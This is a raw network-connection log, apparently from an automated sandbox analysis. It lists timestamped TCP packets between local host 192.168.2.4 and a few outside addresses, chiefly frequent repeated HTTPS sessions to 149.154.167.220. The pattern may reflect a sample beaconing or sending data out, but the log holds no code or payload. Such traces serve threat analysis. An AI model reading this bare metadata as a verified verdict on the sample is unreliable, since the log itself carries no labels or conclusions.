Jun 5, 2024 03:56:53.771188974 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.622483969 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.623701096 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.623718977 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.883558035 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.884016991 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.884062052 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.884242058 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.884255886 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.884336948 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.884361029 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.884932041 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.884964943 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.885114908 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.885201931 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.885339975 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.885513067 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.885544062 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:54.885601997 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:54.885741949 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:55.571376085 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:55.571835995 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:55.571947098 CEST	443	49762	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:55.572267056 CEST	49762	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:55.577466965 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:55.577523947 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:55.577837944 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:55.578039885 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:55.578058958 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.424401045 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.424493074 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.426295996 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.426304102 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.426614046 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.427527905 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.472512960 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.699914932 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.699987888 CEST	443	49764	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.700113058 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.700381994 CEST	49764	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.703527927 CEST	49765	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.703615904 CEST	443	49765	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:56.703701973 CEST	49765	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.703944921 CEST	49765	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:56.704014063 CEST	443	49765	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:57.532622099 CEST	49766	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:57.537615061 CEST	80	49766	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:57.537734032 CEST	49766	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:57.538047075 CEST	49766	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:57.539037943 CEST	443	49765	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:57.542917013 CEST	49765	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:57.542927980 CEST	80	49766	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:57.542964935 CEST	443	49765	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:57.787166119 CEST	443	49765	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:57.787245035 CEST	443	49765	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:57.787312984 CEST	49765	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:57.788506031 CEST	49765	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:58.126766920 CEST	80	49766	208.95.112.1	192.168.2.4
Jun 5, 2024 03:56:58.289534092 CEST	49766	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:56:58.810631990 CEST	49767	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:58.810689926 CEST	443	49767	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:58.810753107 CEST	49767	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:58.811155081 CEST	49767	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:58.811182976 CEST	443	49767	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:58.844991922 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:58.845077038 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:58.845180988 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:58.856044054 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:58.856084108 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.450568914 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.450781107 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:59.452574968 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:59.452630043 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.453207970 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.466286898 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:59.512535095 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.590859890 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.590944052 CEST	443	49768	185.199.109.133	192.168.2.4
Jun 5, 2024 03:56:59.591041088 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:59.593640089 CEST	49768	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:56:59.662316084 CEST	443	49767	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:59.666269064 CEST	49767	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:59.666290045 CEST	443	49767	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:59.913306952 CEST	443	49767	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:59.913374901 CEST	443	49767	149.154.167.220	192.168.2.4
Jun 5, 2024 03:56:59.913459063 CEST	49767	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:56:59.913853884 CEST	49767	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:00.914966106 CEST	49769	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:00.915054083 CEST	443	49769	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:00.915348053 CEST	49769	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:00.915735960 CEST	49769	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:00.915822983 CEST	443	49769	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:01.751945019 CEST	443	49769	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:01.753365040 CEST	49769	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:01.753454924 CEST	443	49769	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:01.999195099 CEST	443	49769	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:01.999245882 CEST	443	49769	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:01.999516964 CEST	49769	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:02.000467062 CEST	49769	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.010309935 CEST	49770	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.010396004 CEST	443	49770	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:03.010499001 CEST	49770	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.010931969 CEST	49770	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.011015892 CEST	443	49770	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:03.691802025 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.691838980 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:03.691903114 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.692394018 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.692405939 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:03.856656075 CEST	443	49770	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:03.858139992 CEST	49770	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:03.858230114 CEST	443	49770	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.106009960 CEST	443	49770	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.106079102 CEST	443	49770	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.106340885 CEST	49770	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.106482983 CEST	49770	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.536267042 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.536353111 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.537652016 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.537671089 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.537852049 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.538664103 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.584507942 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.806929111 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.806978941 CEST	443	49771	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.807044029 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.807410002 CEST	49771	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.844865084 CEST	49772	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.844949007 CEST	443	49772	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:04.845061064 CEST	49772	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.848416090 CEST	49772	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:04.848520041 CEST	443	49772	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.118251085 CEST	49773	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.118299961 CEST	443	49773	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.118355036 CEST	49773	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.118604898 CEST	49773	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.118621111 CEST	443	49773	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.691519976 CEST	443	49772	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.692537069 CEST	49772	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.692624092 CEST	443	49772	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.946535110 CEST	443	49772	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.946594954 CEST	443	49772	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.946732044 CEST	49772	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.947524071 CEST	49772	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.959889889 CEST	443	49773	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:05.966361046 CEST	49773	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:05.966392994 CEST	443	49773	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:06.211299896 CEST	443	49773	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:06.211360931 CEST	443	49773	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:06.211529970 CEST	49773	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:06.211755991 CEST	49773	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:06.673371077 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:06.678292990 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:06.678442955 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:06.678442955 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:06.683711052 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:06.975276947 CEST	49776	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:06.975323915 CEST	443	49776	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:06.975399971 CEST	49776	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:06.975835085 CEST	49776	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:06.975850105 CEST	443	49776	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:07.338149071 CEST	49777	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:07.338232994 CEST	443	49777	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:07.338321924 CEST	49777	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:07.338697910 CEST	49777	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:07.338783979 CEST	443	49777	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:07.569123030 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569186926 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569195032 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569291115 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:07.569427967 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569436073 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569446087 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569550991 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:07.569550991 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:07.569689035 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569832087 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569839954 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.569977045 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:07.572278023 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:07.573834896 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:07.573865891 CEST	443	49778	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:07.574052095 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:07.577795982 CEST	80	49775	216.58.212.132	192.168.2.4
Jun 5, 2024 03:57:07.577923059 CEST	49775	80	192.168.2.4	216.58.212.132
Jun 5, 2024 03:57:07.602119923 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:07.602138042 CEST	443	49778	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:07.834928989 CEST	443	49776	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:07.836611986 CEST	49776	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:07.836623907 CEST	443	49776	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.085431099 CEST	443	49776	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.085488081 CEST	443	49776	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.085556030 CEST	49776	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:08.085913897 CEST	49776	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:08.184772968 CEST	443	49777	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.185888052 CEST	49777	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:08.185977936 CEST	443	49777	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.430898905 CEST	443	49778	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:08.434501886 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:08.434519053 CEST	443	49778	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:08.435976982 CEST	443	49778	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:08.436043978 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:08.436084986 CEST	443	49777	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.436131001 CEST	443	49777	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:08.436304092 CEST	49777	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:08.436536074 CEST	49777	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:08.444355965 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:08.444541931 CEST	443	49778	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:08.444617033 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:08.445992947 CEST	49778	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:09.087553978 CEST	49779	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.087594986 CEST	443	49779	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:09.087662935 CEST	49779	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.087965965 CEST	49779	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.087980986 CEST	443	49779	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:09.906120062 CEST	49780	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.906219959 CEST	443	49780	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:09.906337976 CEST	49780	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.906769037 CEST	49780	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.906817913 CEST	443	49780	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:09.923748016 CEST	443	49779	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:09.925106049 CEST	49779	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:09.925132990 CEST	443	49779	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.172754049 CEST	443	49779	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.172914982 CEST	443	49779	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.173000097 CEST	49779	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:10.173301935 CEST	49779	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:10.742496967 CEST	443	49780	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.744752884 CEST	49780	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:10.744785070 CEST	443	49780	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.990343094 CEST	443	49780	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.990422010 CEST	443	49780	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:10.990480900 CEST	49780	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:10.990850925 CEST	49780	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:11.180648088 CEST	49781	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:11.180726051 CEST	443	49781	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:11.180809975 CEST	49781	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:11.181122065 CEST	49781	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:11.181153059 CEST	443	49781	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.024338007 CEST	443	49781	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.027745962 CEST	49781	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.027787924 CEST	443	49781	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.042231083 CEST	49782	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.042270899 CEST	443	49782	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.042355061 CEST	49782	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.042536020 CEST	49782	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.042551041 CEST	443	49782	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.280708075 CEST	443	49781	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.280776978 CEST	443	49781	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.280955076 CEST	49781	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.281219006 CEST	49781	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.879005909 CEST	443	49782	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:12.880204916 CEST	49782	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:12.880255938 CEST	443	49782	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:13.124239922 CEST	443	49782	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:13.124325037 CEST	443	49782	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:13.124378920 CEST	49782	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:13.124672890 CEST	49782	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:13.312683105 CEST	49783	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:13.312769890 CEST	443	49783	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:13.312885046 CEST	49783	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:13.314361095 CEST	49783	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:13.314405918 CEST	443	49783	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.137998104 CEST	49784	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.138086081 CEST	443	49784	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.138350010 CEST	49784	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.138464928 CEST	49784	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.138494968 CEST	443	49784	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.153503895 CEST	443	49783	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.154692888 CEST	49783	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.154783010 CEST	443	49783	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.401449919 CEST	443	49783	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.401755095 CEST	443	49783	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.401818037 CEST	49783	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.408190966 CEST	49783	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.641798019 CEST	49785	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:14.647003889 CEST	80	49785	208.95.112.1	192.168.2.4
Jun 5, 2024 03:57:14.647195101 CEST	49785	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:14.647624969 CEST	49785	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:14.652618885 CEST	80	49785	208.95.112.1	192.168.2.4
Jun 5, 2024 03:57:14.980442047 CEST	443	49784	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:14.981770039 CEST	49784	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:14.981861115 CEST	443	49784	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:15.230884075 CEST	443	49784	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:15.230976105 CEST	443	49784	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:15.231229067 CEST	49784	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:15.232150078 CEST	49784	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:15.237062931 CEST	80	49785	208.95.112.1	192.168.2.4
Jun 5, 2024 03:57:15.289686918 CEST	49785	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:15.414973974 CEST	49786	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:15.415010929 CEST	443	49786	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:15.415091038 CEST	49786	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:15.415405989 CEST	49786	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:15.415420055 CEST	443	49786	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:15.853584051 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:15.853638887 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:15.853739023 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:15.865384102 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:15.865397930 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.243294954 CEST	49788	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:16.243338108 CEST	443	49788	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:16.243431091 CEST	49788	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:16.243693113 CEST	49788	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:16.243705034 CEST	443	49788	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:16.251779079 CEST	443	49786	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:16.253262997 CEST	49786	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:16.253309011 CEST	443	49786	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:16.468743086 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.468868971 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:16.474390984 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:16.474411964 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.474787951 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.496479988 CEST	443	49786	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:16.496885061 CEST	443	49786	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:16.496978045 CEST	49786	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:16.497169018 CEST	49786	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:16.498529911 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:16.540541887 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.626293898 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.626410961 CEST	443	49787	185.199.109.133	192.168.2.4
Jun 5, 2024 03:57:16.626471043 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:16.634875059 CEST	49787	443	192.168.2.4	185.199.109.133
Jun 5, 2024 03:57:17.046148062 CEST	49785	80	192.168.2.4	208.95.112.1
Jun 5, 2024 03:57:17.079617977 CEST	443	49788	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:17.080764055 CEST	49788	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:17.080789089 CEST	443	49788	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:17.327146053 CEST	443	49788	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:17.327220917 CEST	443	49788	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:17.327281952 CEST	49788	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:17.327666998 CEST	49788	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:17.508738041 CEST	49789	443	192.168.2.4	149.154.167.220
Jun 5, 2024 03:57:17.508824110 CEST	443	49789	149.154.167.220	192.168.2.4
Jun 5, 2024 03:57:17.508941889 CEST	49789	443	192.168.2.4	149.154.167.220
